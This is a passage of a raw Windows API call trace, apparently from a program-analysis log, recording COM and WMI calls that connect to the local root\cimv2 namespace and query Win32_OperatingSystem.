ppvObject=0x188acc*=0x0) returned 0x80004002 [0231.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x188ad8 | out: ppvObject=0x188ad8*=0x7af3c0) returned 0x0 [0231.469] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7af3c0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x188ae0 | out: pCid=0x188ae0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.469] WbemDefPath:IUnknown:Release (This=0x7af3c0) returned 0x3 [0231.469] CoGetContextToken (in: pToken=0x188b38 | out: pToken=0x188b38) returned 0x0 [0231.469] CoGetContextToken (in: pToken=0x188f40 | out: pToken=0x188f40) returned 0x0 [0231.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x188fd0 | out: ppvObject=0x188fd0*=0x0) returned 0x80004002 [0231.469] WbemDefPath:IUnknown:Release (This=0x5b20820) returned 0x2 [0231.469] WbemDefPath:IUnknown:Release (This=0x5b20820) returned 0x1 [0231.469] CoGetContextToken (in: pToken=0x1898c8 | out: pToken=0x1898c8) returned 0x0 [0231.470] CoGetContextToken (in: pToken=0x189828 | out: pToken=0x189828) returned 0x0 [0231.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x1898f8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1898f4 | out: ppvObject=0x1898f4*=0x5b20820) returned 0x0 [0231.470] WbemDefPath:IUnknown:AddRef (This=0x5b20820) returned 0x3 [0231.470] WbemDefPath:IUnknown:Release (This=0x5b20820) returned 0x2 [0231.471] WbemDefPath:IWbemPath:SetText (This=0x5b20820, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0231.472] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0231.472] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0xf, pszText=0x0) returned 0x0 [0231.473] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a170*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a170*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.480] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a0fc | out: ppv=0x18a0fc*=0x766114) returned 0x0 [0231.480] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a0f4 | out: pAptType=0x18a0f4*=1) returned 0x0 [0231.480] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a0f8 | out: ppvObject=0x18a0f8*=0x0) returned 0x80004002 [0231.480] IUnknown:Release (This=0x766114) returned 0x0 [0231.480] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x18a004 | out: lpiid=0x18a004) returned 0x0 [0231.481] CoGetClassObject (in: rclsid=0x7b5574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d18 | out: ppv=0x189d18*=0x5b208e0) returned 0x0 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b208e0, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f30 | out: ppvObject=0x189f30*=0x0) returned 0x80004002 [0231.498] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b208e0, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f44 | out: ppvObject=0x189f44*=0x5b20a00) returned 0x0 [0231.498] WbemLocator:IUnknown:Release (This=0x5b208e0) returned 0x0 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b64 | out: ppvObject=0x189b64*=0x5b20a00) returned 0x0 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b20 | out: ppvObject=0x189b20*=0x0) returned 0x80004002 [0231.498] WbemLocator:IUnknown:AddRef (This=0x5b20a00) returned 0x3 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18947c | out: ppvObject=0x18947c*=0x0) returned 0x80004002 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18942c | out: ppvObject=0x18942c*=0x0) returned 0x80004002 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189438 | out: ppvObject=0x189438*=0x0) returned 0x80004002 [0231.498] CoGetContextToken (in: pToken=0x189498 | out: pToken=0x189498) returned 0x0 [0231.498] CoGetObjectContext (in: riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7cfc74 | out: ppv=0x7cfc74*=0x766108) returned 0x0 [0231.498] CoGetContextToken (in: pToken=0x1898a0 | out: pToken=0x1898a0) returned 0x0 [0231.498] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189930 | out: ppvObject=0x189930*=0x0) returned 0x80004002 [0231.498] WbemLocator:IUnknown:Release (This=0x5b20a00) returned 0x2 [0231.498] WbemLocator:IUnknown:Release (This=0x5b20a00) returned 0x1 [0231.499] CoGetContextToken (in: pToken=0x189f10 | out: pToken=0x189f10) returned 0x0 [0231.499] CoGetContextToken (in: pToken=0x189e70 | out: pToken=0x189e70) returned 0x0 [0231.499] WbemLocator:IUnknown:QueryInterface (in: This=0x5b20a00, riid=0x189f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x5b20a00) returned 0x0 [0231.499] WbemLocator:IUnknown:AddRef (This=0x5b20a00) returned 0x3 [0231.499] WbemLocator:IUnknown:Release (This=0x5b20a00) returned 0x2 [0231.500] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a0d8 | out: puCount=0x18a0d8*=0x2) returned 0x0 [0231.501] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0d4*=0x0, pszText=0x0 | out: puBuffLength=0x18a0d4*=0xf, pszText=0x0) returned 0x0 [0231.501] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0d4*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a0d4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.501] CoCreateInstance (in: rclsid=0x73cf1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73cf12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fb0 | out: ppv=0x189fb0*=0x5b20a10) returned 0x0 [0231.501] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5b20a10, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a044 | out: ppNamespace=0x18a044*=0x5b2d204) returned 0x0 [0231.612] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d204, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee0 | out: ppvObject=0x189ee0*=0x7a122c) returned 0x0 [0231.612] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7a122c, pProxy=0x5b2d204, pAuthnSvc=0x189f30, pAuthzSvc=0x189f2c, pServerPrincName=0x189f24, pAuthnLevel=0x189f28, pImpLevel=0x189f18, pAuthInfo=0x189f1c, pCapabilites=0x189f20 | out: pAuthnSvc=0x189f30*=0xa, pAuthzSvc=0x189f2c*=0x0, pServerPrincName=0x189f24, pAuthnLevel=0x189f28*=0x6, pImpLevel=0x189f18*=0x2, pAuthInfo=0x189f1c, pCapabilites=0x189f20*=0x1) returned 0x0 [0231.612] WbemLocator:IUnknown:Release (This=0x7a122c) returned 0x1 [0231.612] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d204, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed4 | out: ppvObject=0x189ed4*=0x7a124c) returned 0x0 [0231.612] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d204, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed0 | out: ppvObject=0x189ed0*=0x7a122c) returned 0x0 [0231.612] WbemLocator:IClientSecurity:SetBlanket (This=0x7a122c, pProxy=0x5b2d204, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.613] WbemLocator:IUnknown:Release (This=0x7a122c) returned 0x2 [0231.613] WbemLocator:IUnknown:Release (This=0x7a124c) returned 0x1 [0231.613] CoTaskMemFree (pv=0x7b5778) [0231.613] WbemLocator:IUnknown:Release (This=0x5b20a10) returned 0x0 [0231.613] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d204, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ad0 | out: ppvObject=0x189ad0*=0x7a124c) returned 0x0 [0231.613] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a8c | out: ppvObject=0x189a8c*=0x0) returned 0x80004002 [0231.613] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898ac | out: ppvObject=0x1898ac*=0x0) returned 0x80004002 [0231.614] WbemLocator:IUnknown:AddRef (This=0x7a124c) returned 0x3 [0231.614] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0231.614] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18939c | out: ppvObject=0x18939c*=0x0) returned 0x80004002 [0231.614] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893a8 | out: ppvObject=0x1893a8*=0x7a11ac) returned 0x0 [0231.614] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a11ac, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893b0 | out: pCid=0x1893b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.614] WbemLocator:IUnknown:Release (This=0x7a11ac) returned 0x3 [0231.614] CoGetContextToken (in: pToken=0x189408 | out: pToken=0x189408) returned 0x0 [0231.614] CoGetContextToken (in: pToken=0x189810 | out: pToken=0x189810) returned 0x0 [0231.615] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898a0 | out: ppvObject=0x1898a0*=0x7a1234) returned 0x0 [0231.615] WbemLocator:IRpcOptions:Query (in: This=0x7a1234, pPrx=0x7a124c, dwProperty=2, pdwValue=0x1898c8 | out: pdwValue=0x1898c8) returned 0x80004002 [0231.615] WbemLocator:IUnknown:Release (This=0x7a1234) returned 0x3 [0231.615] WbemLocator:IUnknown:Release (This=0x7a124c) returned 0x2 [0231.615] CoGetContextToken (in: pToken=0x189de0 | out: pToken=0x189de0) returned 0x0 [0231.615] CoGetContextToken (in: pToken=0x189d40 | out: pToken=0x189d40) returned 0x0 [0231.615] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x189e10*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e0c | out: ppvObject=0x189e0c*=0x5b2d204) returned 0x0 [0231.615] WbemLocator:IUnknown:AddRef (This=0x5b2d204) returned 0x4 [0231.615] WbemLocator:IUnknown:Release (This=0x5b2d204) returned 0x3 [0231.615] WbemLocator:IUnknown:Release (This=0x5b2d204) returned 0x2 [0231.624] SysStringLen (param_1=0x0) returned 0x0 [0231.624] CoGetContextToken (in: pToken=0x189dd8 | out: pToken=0x189dd8) returned 0x0 [0231.624] WbemLocator:IUnknown:AddRef (This=0x7a124c) returned 0x3 [0231.624] WbemLocator:IUnknown:QueryInterface (in: This=0x7a124c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c6c | out: ppvObject=0x189c6c*=0x7a124c) returned 0x0 [0231.625] WbemLocator:IUnknown:Release (This=0x7a124c) returned 0x3 [0231.625] WbemLocator:IUnknown:Release (This=0x7a124c) returned 0x2 [0231.625] CoGetContextToken (in: pToken=0x189ec8 | out: pToken=0x189ec8) returned 0x0 [0231.625] WbemLocator:IUnknown:AddRef (This=0x5b2d204) returned 0x3 [0231.625] IWbemServices:ExecQuery (in: This=0x5b2d204, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x18a0e0 | out: ppEnum=0x18a0e0*=0x5b2c934) returned 0x0 [0231.631] IUnknown:QueryInterface (in: This=0x5b2c934, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x5b2c938) returned 0x0 [0231.631] IClientSecurity:QueryBlanket (in: This=0x5b2c938, pProxy=0x5b2c934, pAuthnSvc=0x189f88, pAuthzSvc=0x189f84, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80, pImpLevel=0x189f70, pAuthInfo=0x189f74, pCapabilites=0x189f78 | out: pAuthnSvc=0x189f88*=0xa, pAuthzSvc=0x189f84*=0x0, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80*=0x6, pImpLevel=0x189f70*=0x2, pAuthInfo=0x189f74, pCapabilites=0x189f78*=0x1) returned 0x0 [0231.631] IUnknown:Release (This=0x5b2c938) returned 0x1 [0231.631] IUnknown:QueryInterface (in: This=0x5b2c934, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x7a0f7c) returned 0x0 [0231.631] IUnknown:QueryInterface (in: This=0x5b2c934, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x5b2c938) returned 0x0 [0231.631] IClientSecurity:SetBlanket (This=0x5b2c938, pProxy=0x5b2c934, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.634] IUnknown:Release (This=0x5b2c938) returned 0x2 [0231.634] WbemLocator:IUnknown:Release (This=0x7a0f7c) returned 0x1 [0231.634] CoTaskMemFree (pv=0x7b57a8) [0231.635] IUnknown:QueryInterface (in: This=0x5b2c934, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b24 | out: ppvObject=0x189b24*=0x7a0f7c) returned 0x0 [0231.635] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x0) returned 0x80004002 [0231.635] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x0) returned 0x80004002 [0231.635] WbemLocator:IUnknown:AddRef (This=0x7a0f7c) returned 0x3 [0231.635] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0231.636] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0231.636] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893f8 | out: ppvObject=0x1893f8*=0x7a0edc) returned 0x0 [0231.636] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a0edc, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189400 | out: pCid=0x189400*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.636] WbemLocator:IUnknown:Release (This=0x7a0edc) returned 0x3 [0231.636] CoGetContextToken (in: pToken=0x189458 | out: pToken=0x189458) returned 0x0 [0231.636] CoGetContextToken (in: pToken=0x189860 | out: pToken=0x189860) returned 0x0 [0231.636] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f0 | out: ppvObject=0x1898f0*=0x7a0f64) returned 0x0 [0231.636] WbemLocator:IRpcOptions:Query (in: This=0x7a0f64, pPrx=0x7a0f7c, dwProperty=2, pdwValue=0x189918 | out: pdwValue=0x189918) returned 0x80004002 [0231.636] WbemLocator:IUnknown:Release (This=0x7a0f64) returned 0x3 [0231.636] WbemLocator:IUnknown:Release (This=0x7a0f7c) returned 0x2 [0231.636] CoGetContextToken (in: pToken=0x189e38 | out: pToken=0x189e38) returned 0x0 [0231.636] CoGetContextToken (in: pToken=0x189d98 | out: pToken=0x189d98) returned 0x0 [0231.636] WbemLocator:IUnknown:QueryInterface (in: This=0x7a0f7c, riid=0x189e68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e64 | out: ppvObject=0x189e64*=0x5b2c934) returned 0x0 [0231.636] IUnknown:AddRef (This=0x5b2c934) returned 0x4 [0231.636] IUnknown:Release (This=0x5b2c934) returned 0x3 [0231.637] IUnknown:Release (This=0x5b2c934) returned 0x2 [0231.637] WbemLocator:IUnknown:Release (This=0x5b2d204) returned 0x2 [0231.637] SysStringLen (param_1=0x0) returned 0x0 [0231.637] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a12c | out: puCount=0x18a12c*=0x2) returned 0x0 [0231.637] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a128*=0x0, pszText=0x0 | out: puBuffLength=0x18a128*=0xf, pszText=0x0) returned 0x0 [0231.637] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a128*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a128*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.637] CoGetContextToken (in: pToken=0x189f80 | out: pToken=0x189f80) returned 0x0 [0231.637] IUnknown:AddRef (This=0x5b2c934) returned 0x3 [0231.637] IEnumWbemClassObject:Clone (in: This=0x5b2c934, ppEnum=0x18a13c | out: ppEnum=0x18a13c*=0x5b2d2a4) returned 0x0 [0231.640] IUnknown:QueryInterface (in: This=0x5b2d2a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a000 | out: ppvObject=0x18a000*=0x5b2d2a8) returned 0x0 [0231.640] IClientSecurity:QueryBlanket (in: This=0x5b2d2a8, pProxy=0x5b2d2a4, pAuthnSvc=0x18a050, pAuthzSvc=0x18a04c, pServerPrincName=0x18a044, pAuthnLevel=0x18a048, pImpLevel=0x18a038, pAuthInfo=0x18a03c, pCapabilites=0x18a040 | out: pAuthnSvc=0x18a050*=0xa, pAuthzSvc=0x18a04c*=0x0, pServerPrincName=0x18a044, pAuthnLevel=0x18a048*=0x6, pImpLevel=0x18a038*=0x2, pAuthInfo=0x18a03c, pCapabilites=0x18a040*=0x1) returned 0x0 [0231.641] IUnknown:Release (This=0x5b2d2a8) returned 0x1 [0231.641] IUnknown:QueryInterface (in: This=0x5b2d2a4, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x7a142c) returned 0x0 [0231.641] IUnknown:QueryInterface (in: This=0x5b2d2a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff0 | out: ppvObject=0x189ff0*=0x5b2d2a8) returned 0x0 [0231.641] IClientSecurity:SetBlanket (This=0x5b2d2a8, pProxy=0x5b2d2a4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.642] IUnknown:Release (This=0x5b2d2a8) returned 0x2 [0231.642] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x1 [0231.642] CoTaskMemFree (pv=0x7b5748) [0231.642] IUnknown:QueryInterface (in: This=0x5b2d2a4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 